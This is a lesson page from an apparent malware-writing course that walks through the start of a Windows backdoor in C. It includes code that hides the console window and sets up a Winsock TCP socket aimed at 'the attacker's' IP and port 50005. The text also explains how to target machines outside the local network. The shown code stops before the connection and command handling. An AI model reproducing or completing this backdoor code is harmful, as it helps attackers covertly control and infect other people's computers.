---
title: Creating our socket object
course: code_malware
section: "Building sockets"
layout: lesson
---

Let's create the socket which will allow us to connect our server and our
client.

The first thing we'll need is to create a structure called "_ServAddr_" whose type
will also be "_sockaddr_in_". In C, a structure is defined and called as it is
known as classes in other languages. We will also define the port in which the
server is being executed, to do so, we'll create a variable called "_ServPort_"
whose type is an "_unsigned int_".

The reason why we are creating these variables, is because we'll need to define
both the IP address and the port in which our backdoor will perform the
connection to send and receive data.

Let's create a new variable called "_ServIP_" whose type will be the pointer to
a char. The code we've written in this lesson so far looks like this:

```c
struct sockaddr_in ServAddr;
unsigned short ServPort;
char *ServIP;
```

> Tip: For those who are not familiriased with C-based languages programming, a
> pointer is a variable that references a block or a space in memory.

The last variable we'll need to create so far, will be called "_wsaData_" and
its type will be "**WSADATA**". **WSADATA** is a structure that contains
information about Windows sockets, so this is something we'll need to stablish a
connection through sockets between server and client.

Once we've properly defined the previously mentioned variables, we'll set to
"_ServIP_" the IP address of the machine that will be sending data to the
infected device, that's you, the attacker. If you are going to be using virtual
machines to perform tests, you must specify the IP address of the device you
will be using, you can see your IP address by executing "`ifconfig`" in a
terminal emulator, there will appear all of the network interfaces available,
you should use the IP address of the interface you will be using when running
the tests. If you will infect a windows Machine that is not in your local
network, you must use your public IP address, you can get it by running
"`curl icanhazip.com`" in a shell.

To assign the value to "_ServIP_", in a new line, type:

```c
ServIP = "[IP ADDRESS]"
```

In the same way, we'll specify the port in which the server will be awaiting for
the connection. To do so, we will need to assign a value to "_ServPort_" too,
but, unlike "_ServIP_" this one is not of type "_char_", this one is "_int_",
which means, that "_ServPort_" will only accept integer numbers. You can choose
the port you want as long as it remains open and is not being used by some other
application. I'll be using the port 50005.

Once we have stored that information into our variables, we'll use the
"_WSAStartup_" inside of an "_if_" statement as it is shown below:

```c
if(WSAStartup()) {
}
```

To this function, we'll need to pass some arguments, the first one is a function
called "**MAKEWORD**", as it is a function, we'll open another pair of brackets,
inside of them we'll write "**2,0**" and the second argument that "_WSAStartup_"
requires is the memory block that "_wsaData_" is in.

> To get the block of memory of a pointer variable, you write "&" before the
> variable name, for example: "&wsaData"

We'll check if "_WSAStartup(MAKEWORD(2,0), &wsaData)_" is different to zero, if
it is we'll exit the program. This if statement looks like this:

```c
if(WSAStartup(MAKEWORD(2,0), &wsaData) != 0) {
  exit(1);
}
```

What we are doing, is check if the value that the function "_WSAStartup_"
returns is equals to zero. If it is, what is inside of the **if** block will not
be executed as the condition is not true, but if it is not zero, what is inside
of the curly brackets ("{}") will be executed, which means, the program will be
stopped.

Once the program was being initialised properly and its execution was not
stopped, we'll create a socket object. To do, we'll go out of the main function
"WinMain" and we will define it there. Why? Simple, because we will need that
same socket outside of the "_WinMain_" function, if we define it there, it would
be only accessible for what is inside of that function.

When we are outside of the function, we will create an integer variable called
"_sock_".

Now, once we have defined our "_sock_" variable, we'll return to the "_WinMain_"
function and right below of our "**if**" comparison we'll assign the following
value to sock:

```c
sock = socket(AF_INET, SOCK_STREAM, 0);
```

We are defining sock as a socket by using the function "_socket_", this function
takes three arguments, the first one "**AF_INET**" represents an IPv4
connection, the second parameter "**SOCK_STREAM**" represents a TCP connection
and the third parameter is "0" as we don't need anything else.

What we will need to do later, is to modify the paramters of "_ServAddr_" as
it inherits the "_sockaddr_in_" values, but before we do that, we'll need to
turn into zeroes all of them, to do so we will need the "_memset_" function.
This function takes three parameters, the first is the memory block that
"_ServAddr_" uses (remember to use the "&"), the second parameter will be "0" as
we want to turn all of the memory space that "_ServAddr_" uses into zeros and
the third, is the size of the memory that is being use by "_ServAddr_" you can
get it by simple passing "**sizeof** _ServAddr_". That line would look like
this:

```c
memset(&ServAddr, 0, sizeof(ServAddr));
```

Now let's add custom values to the "_ServAddr_" variables (to access to them
we'll need to use a dot "." after the variable name). The first is
"_sin_family_" whose value will be set to "**AF_INET**", the second one is
"_sin_addr.s_addr_" whose value will be the server's IP address. We can't use
our variable "_ServIP_" as it is an string and not an IP address (that our C
program can recognise), so we'll convert it using a function called "_inet_addr_"
and pass "_ServIP_" as argument. The last parameter will be "_sin_port_" and as
it happened with the IP address we can't simply use our variable "_ServPort_",
instead of using "_inet_addr_" we will use "_htons_" and we will pass
"_ServPort_" as argument, in that way, our C program will recognise and be able
to work with our port.

Our code so far looks like this:

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <winsock2.h>
#include <windows.h>
#include <winuser.h>
#include <wininet.h>
#include <windowsx.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>

int sock;

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrev, LPSTR lpCmdLine, int nCmdShow) {
  HWND stealth;
  AllocConsole();
  stealth = FindWindowA("ConsoleWindow", NULL);

  ShowWindow(stealth, 0);

  struct sockaddr_in ServAddr;
  unsigned short ServPort;
  char *ServIP;
  WSADATA wsaData;

  ServIP = "192.168.1.1";
  ServPort = 50005;

  if(WSAStartup(MAKEWORD(2,0), &wsaData) != 0) {
    exit(1);
  }

  sock = socket(AF_INET, SOCK_STREAM, 0);

  memset(&ServAddr, 0, sizeof(ServAddr));
  ServAddr.sin_family = AF_INET;
  ServAddr.sin_addr.s_addr = inet_addr(ServIP);
  ServAddr.sin_port = htons(ServPort);
}
```
